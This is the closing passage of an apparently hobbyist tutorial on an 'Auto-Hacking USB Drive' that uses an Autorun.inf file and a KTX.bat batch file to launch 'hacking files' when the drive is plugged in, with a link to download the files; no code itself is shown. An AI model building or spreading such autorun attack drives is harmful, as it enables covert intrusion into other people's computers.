Ok. This is the end of the tutorial. You should have the Autorun.inf file, the KTX.bat file, and some hacking files of your choice. To work the magic of the Auto-Hacking USB Drive, just unplug the drive in question and plug it back in. If it doesn't work, you did something wrong, because I told you how to do it right. Either that, or you have strange computer settings.

If you are confused as to how to make the batch file or the Autorun file, download them here.

Autohax0r Files.zip400 bytes

 

Read More